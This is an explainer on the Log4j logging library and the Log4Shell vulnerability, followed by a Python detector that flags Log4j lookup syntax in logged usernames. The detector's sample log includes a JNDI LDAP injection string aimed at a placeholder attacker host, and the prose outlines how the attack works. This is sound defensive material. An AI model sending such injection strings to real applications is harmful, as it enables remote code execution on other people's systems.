Log4j is a logging framework for Java. Those of us in development and security try to do the right thing by logging what happens inside applications: it helps developers troubleshoot and helps security analysts spot anomalies in those logs. Let's say you're developing an application and want to log properly, but don't want to write all the code that generates those logs. That's where Log4j comes in. It's a free, open-source framework that you can drop into your project and save a ton of time.
Log4j is used in millions of third-party enterprise applications, cloud services, and manufacturers' products, including IoT devices. It's literally on Mars: the Mars 2020 drone, Ingenuity, logs data with Log4j.
Unfortunately, a bug in this library creates a vulnerability now known as Log4Shell. It allows an attacker to send a crafted message to a vulnerable application and potentially execute malicious code on it.
Three factors make this a perfect storm: the vulnerability is extremely widespread, it's difficult to pinpoint every place the library exists, and it's extremely easy to exploit. All an attacker needs to do is prepare a malicious file, place it on a server they control, and send some modified text to a field that the application server logs.
Once the server logs that string, Log4j retrieves the malicious code from the attacker's server and executes it. The potential for the attacker to then control the application and move laterally within an organization's network is very real.
Does this mean every software using Log4j is vulnerable to this exploit?
Not at all! The caveat is that your application has to be logging a field that an attacker can send that modified text to. Think of it like this: let's say you have a Java application that lets users log in with an account. Do you want to log every attempted username? Probably! But that's also a perfect example of a field an attacker could use to submit that modified text instead of a username.
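As an added example (not part of the original article), here is a small detector for exactly the login-form scenario above: it reads auth-log lines in which the application logged every attempted username and flags any username that carries Log4j lookup syntax instead of a name. It assumes two facts the article only alludes to: Log4j expands `${prefix:value}` lookup expressions while formatting a message, and Log4Shell rides on the `jndi` prefix; the log format and the host name inside the sample are constructed placeholders.

```python
from __future__ import annotations
import re

# Constructed sample auth log, modelled on the login-form scenario in the text:
# the application logs every attempted username. Lines 1, 2 and 4 are benign;
# line 3 carries a Log4j lookup expression where a username belongs. The host
# name in it is a placeholder, not a real indicator.
SAMPLE_LOG = """\
2021-12-10T10:01:02Z INFO  login attempt user="alice" result=ok
2021-12-10T10:01:09Z INFO  login attempt user="bob" result=fail
2021-12-10T10:01:15Z INFO  login attempt user="${jndi:ldap://attacker.example/a}" result=fail
2021-12-10T10:01:20Z INFO  login attempt user="carol$" result=ok
"""

# Log4j substitutes ${prefix:value} expressions when it formats a message; the
# Log4Shell bug is the jndi prefix fetching remote content. This regex matches
# any lookup expression whose body contains no further braces.
LOOKUP_RE = re.compile(r"\$\{([A-Za-z0-9_]+):([^{}]*)\}")
# Extracts the logged username from one line of the constructed format above.
USER_RE = re.compile(r'user="([^"]*)" result=')


def find_lookups(value: str) -> list[tuple[str, str]]:
    """Return (prefix, body) for every Log4j lookup expression in a field."""
    return LOOKUP_RE.findall(value)


def classify(value: str) -> str:
    """Label a logged field: clean, jndi-lookup, or other lookup syntax."""
    lookups = find_lookups(value)
    if not lookups:
        return "clean"
    if any(prefix.lower() == "jndi" for prefix, _ in lookups):
        return "jndi-lookup"
    return "lookup-syntax"  # any lookup in untrusted input still merits review


def scan_log(text: str) -> list[dict]:
    """Flag each line whose logged username carries lookup syntax."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = USER_RE.search(line)
        if not m:
            continue  # line does not follow the expected format; skip it
        verdict = classify(m.group(1))
        if verdict != "clean":
            findings.append({"line": lineno, "user": m.group(1), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['verdict']} in user field {f['user']!r}")
```

A plain `$` in a username, as on line 4, is not flagged; only the full `${prefix:...}` form is, which is the shape Log4j actually expands.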